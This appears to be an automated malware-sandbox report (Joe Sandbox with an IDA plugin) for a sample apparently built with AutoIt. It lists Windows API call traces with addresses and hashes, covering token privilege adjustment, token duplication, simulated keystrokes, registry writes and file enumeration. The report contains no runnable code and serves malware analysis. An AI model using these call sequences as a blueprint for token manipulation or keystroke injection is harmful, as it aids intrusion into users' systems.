                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 108c61470e10cf36ef8bc102df152360ea5d9ee67882e524dd3250b827921ee1
                                                                                                                • Instruction ID: 5471263c1434919b8aeac41f6cc9d4f2f26345dbe359969f316948dd796d4139
                                                                                                                • Opcode Fuzzy Hash: 108c61470e10cf36ef8bc102df152360ea5d9ee67882e524dd3250b827921ee1
                                                                                                                • Instruction Fuzzy Hash: 202133B4948311DFDB18DF64C844A5BBBE2BF88314F05896CE88A577A2D731E805CB92
                                                                                                                APIs
                                                                                                                • __lock_file.LIBCMT ref: 006248A6
                                                                                                                  • Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2597487223-0
                                                                                                                • Opcode ID: 2532f08ca27b888bc04f40227af94fee811acfa4496522b9f368533131007dc4
                                                                                                                • Instruction ID: f1a59028be2faad4cd4e51eef25ac3ca54cbd07030b4c03b6ac0c8d0ae65be29
                                                                                                                • Opcode Fuzzy Hash: 2532f08ca27b888bc04f40227af94fee811acfa4496522b9f368533131007dc4
                                                                                                                • Instruction Fuzzy Hash: EFF0DC31911A28ABDF91AFA4AC063EE36A2AF01321F018408F4209B281DF7CC991DF55
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 82e669679549af56e8484ff451a70e3148d791f6216c75315842980cc81fa3d7
                                                                                                                • Instruction ID: 741b18a88f6e51c2d75ef3f6cf7f5beff1b6426a478d7b3e18abb491461aa4b0
                                                                                                                • Opcode Fuzzy Hash: 82e669679549af56e8484ff451a70e3148d791f6216c75315842980cc81fa3d7
                                                                                                                • Instruction Fuzzy Hash: D7F015B1545B11DFCB389F64E494853BBE2BF143693208A3EE2D682661CB32A840DF40
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006207B0
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2514874351-0
                                                                                                                • Opcode ID: fb70c691a281ff0ea9a4e851748ae79872069b645a9790e8ec2ec480633f7fa5
                                                                                                                • Instruction ID: 901abd7a38c3909da2a7176d5d889e18003b15f0fe761d7ce76eab83a676889b
                                                                                                                • Opcode Fuzzy Hash: fb70c691a281ff0ea9a4e851748ae79872069b645a9790e8ec2ec480633f7fa5
                                                                                                                • Instruction Fuzzy Hash: 60E0CD3694412857C720D6989C05FEA77DEDFC97A1F0541B5FC0CD7244DD60AD8086D4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2638373210-0
                                                                                                                • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction ID: fd159f2428316f1a9fdfdcc95dba56dd633e51de4abf976747366276545eb4d4
                                                                                                                • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction Fuzzy Hash: 71E092B0104B005FD7388A24D800BE373E2AB05304F00091DF2AA93341EB63B8418B59
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wfsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 197181222-0
                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction ID: 1be3a552245d0f50d3d7871c49eb1db028e992cf7e7bf95a53f563eb90f9c25a
                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction Fuzzy Hash: BBB0927644060CB7CE112A82FC02A593B1A9B41764F408020FB0C1C1A2A673A6649A89
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01644011
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: 5f8f7301f6ce5ae7c5d8bdc08fabbebf002588474760b4ba4631f98fd166736b
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: A9E0BF7494410DDFDB00EFB4D94969E7BB4EF04702F100161FD0192281DA309D608A62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0068CB37
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CB95
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0068CBD6
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CC00
                                                                                                                • SendMessageW.USER32 ref: 0068CC29
                                                                                                                • _wcsncpy.LIBCMT ref: 0068CC95
                                                                                                                • GetKeyState.USER32(00000011), ref: 0068CCB6
                                                                                                                • GetKeyState.USER32(00000009), ref: 0068CCC3
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CCD9
                                                                                                                • GetKeyState.USER32(00000010), ref: 0068CCE3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CD0C
                                                                                                                • SendMessageW.USER32 ref: 0068CD33
                                                                                                                • SendMessageW.USER32(?,00001030,?,0068B348), ref: 0068CE37
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0068CE4D
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068CE60
                                                                                                                • SetCapture.USER32(?), ref: 0068CE69
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0068CECE
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068CEDB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068CEF5
                                                                                                                • ReleaseCapture.USER32 ref: 0068CF00
                                                                                                                • GetCursorPos.USER32(?), ref: 0068CF3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0068CF47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068CFA3
                                                                                                                • SendMessageW.USER32 ref: 0068CFD1
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D00E
                                                                                                                • SendMessageW.USER32 ref: 0068D03D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068D05E
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068D06D
                                                                                                                • GetCursorPos.USER32(?), ref: 0068D08D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0068D09A
                                                                                                                • GetParent.USER32(?), ref: 0068D0BA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D123
                                                                                                                • SendMessageW.USER32 ref: 0068D154
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0068D1B2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068D1E2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D20C
                                                                                                                • SendMessageW.USER32 ref: 0068D22F
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0068D281
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068D2B5
                                                                                                                  • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0068D351
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F$pbl
                                                                                                                • API String ID: 3977979337-1181734586
                                                                                                                • Opcode ID: c34db9a20c90e36ac27d05e100d66b2758b04f8aa29a1cb4e24d23a4b54eeb49
                                                                                                                • Instruction ID: 7b89d2e3418b26ba3ab0119e868d15162d63223430b6e1048292a91d49086b47
                                                                                                                • Opcode Fuzzy Hash: c34db9a20c90e36ac27d05e100d66b2758b04f8aa29a1cb4e24d23a4b54eeb49
                                                                                                                • Instruction Fuzzy Hash: 1B42AD74204641AFD724EF24CC58EAABBE6FF49320F14071DF699972A1D771E880DB62
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$_memset
                                                                                                                • String ID: ]k$3ca$DEFINE$P\k$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_a
                                                                                                                • API String ID: 1357608183-4102086565
                                                                                                                • Opcode ID: f8ddcbc90455653cf6d6dbc6d21b3f83541cbdf9d0b9cc90f3c83512b4da9f19
                                                                                                                • Instruction ID: a8ccd7da8cd39271e6a00a63a4db693abb0ed0408eb7d19700bff581eaee42c7
                                                                                                                • Opcode Fuzzy Hash: f8ddcbc90455653cf6d6dbc6d21b3f83541cbdf9d0b9cc90f3c83512b4da9f19
                                                                                                                • Instruction Fuzzy Hash: 15939275A0421A9FDB24CF58C8917EDB7B2FF48711F24816AED45AB381E7709E86CB40
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 006048DF
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0063D665
                                                                                                                • IsIconic.USER32(?), ref: 0063D66E
                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0063D67B
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0063D685
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0063D69B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0063D6A2
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063D6AE
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063D6BF
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063D6C7
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0063D6CF
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0063D6D2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D6E7
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0063D6F2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D6FC
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0063D701
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D70A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0063D70F
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D719
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0063D71E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0063D721
                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0063D748
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 898e50b5063dc4265de2f3338c93162dcea1d55a3cd1a8ddbe80dfaf9814c6c1
                                                                                                                • Instruction ID: c15f546ec3599408cc9bc049c1f92eef604c631c08ee696d38e7a85120ba09e8
                                                                                                                • Opcode Fuzzy Hash: 898e50b5063dc4265de2f3338c93162dcea1d55a3cd1a8ddbe80dfaf9814c6c1
                                                                                                                • Instruction Fuzzy Hash: 77316571A80318BBEB206F619C49FBF7F6EEB44B50F104125FA04EA1D1D6B05D51ABA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 006587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
                                                                                                                  • Part of subcall function 006587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
                                                                                                                  • Part of subcall function 006587E1: GetLastError.KERNEL32 ref: 00658865
                                                                                                                • _memset.LIBCMT ref: 00658353
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006583A5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 006583B6
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006583CD
                                                                                                                • GetProcessWindowStation.USER32 ref: 006583E6
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 006583F0
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0065840A
                                                                                                                  • Part of subcall function 006581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658309), ref: 006581E0
                                                                                                                  • Part of subcall function 006581CB: CloseHandle.KERNEL32(?,?,00658309), ref: 006581F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 2063423040-1027155976
                                                                                                                • Opcode ID: da505d226eb163697843ef4fa495fef1bdb82a007b5373939cdbe679a25abd8f
                                                                                                                • Instruction ID: d27092474929adf30f93e23bd19347c164940e934dae139e9c35826a3bbf0db4
                                                                                                                • Opcode Fuzzy Hash: da505d226eb163697843ef4fa495fef1bdb82a007b5373939cdbe679a25abd8f
                                                                                                                • Instruction Fuzzy Hash: 0F8157B1900209BFDF519FA4DC45AEE7BBAAF08305F144269FC10B7261EB318A58DB20
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0066C78D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066C7E1
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066C806
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066C81D
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0066C844
                                                                                                                • __swprintf.LIBCMT ref: 0066C890
                                                                                                                • __swprintf.LIBCMT ref: 0066C8D3
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • __swprintf.LIBCMT ref: 0066C927
                                                                                                                  • Part of subcall function 00623698: __woutput_l.LIBCMT ref: 006236F1
                                                                                                                • __swprintf.LIBCMT ref: 0066C975
                                                                                                                  • Part of subcall function 00623698: __flsbuf.LIBCMT ref: 00623713
                                                                                                                  • Part of subcall function 00623698: __flsbuf.LIBCMT ref: 0062372B
                                                                                                                • __swprintf.LIBCMT ref: 0066C9C4
                                                                                                                • __swprintf.LIBCMT ref: 0066CA13
                                                                                                                • __swprintf.LIBCMT ref: 0066CA62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 3953360268-2428617273
                                                                                                                • Opcode ID: b545af888bcbacc11c673016a264ea96ecc911ee79a5fcde25674c05ed20c425
                                                                                                                • Instruction ID: 3e29ea744a79b35e9779e5f63c0121957029011983569028dd5a7da4ac6bd372
                                                                                                                • Opcode Fuzzy Hash: b545af888bcbacc11c673016a264ea96ecc911ee79a5fcde25674c05ed20c425
                                                                                                                • Instruction Fuzzy Hash: FFA11DB1448244AFC754EFA4C885DAFB7EEAF94700F40491EF59587292EB34DA08CB66
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0066EFB6
                                                                                                                • _wcscmp.LIBCMT ref: 0066EFCB
                                                                                                                • _wcscmp.LIBCMT ref: 0066EFE2
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0066EFF4
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0066F00E
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0066F026
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F031
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F04D
                                                                                                                • _wcscmp.LIBCMT ref: 0066F074
                                                                                                                • _wcscmp.LIBCMT ref: 0066F08B
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F09D
                                                                                                                • SetCurrentDirectoryW.KERNEL32(006B8920), ref: 0066F0BB
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F0C5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F0D2
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F0E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: 6536d1aabf79aa1696e835cb0ddedbab3af1e5987b80f7bcd9bf044f71a3beab
                                                                                                                • Instruction ID: ded4fe3f847eabecc7d78d3a38da6d2a38e212ae62514c95836be379f675a232
                                                                                                                • Opcode Fuzzy Hash: 6536d1aabf79aa1696e835cb0ddedbab3af1e5987b80f7bcd9bf044f71a3beab
                                                                                                                • Instruction Fuzzy Hash: 6A31C2325012197BDB14EFA4EC69AEE77AE9F48360F100275E804E32A1DB75DE84CB65
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680953
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0068F910,00000000,?,00000000,?,?), ref: 006809C1
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00680A09
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00680A92
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00680DB2
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00680DBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
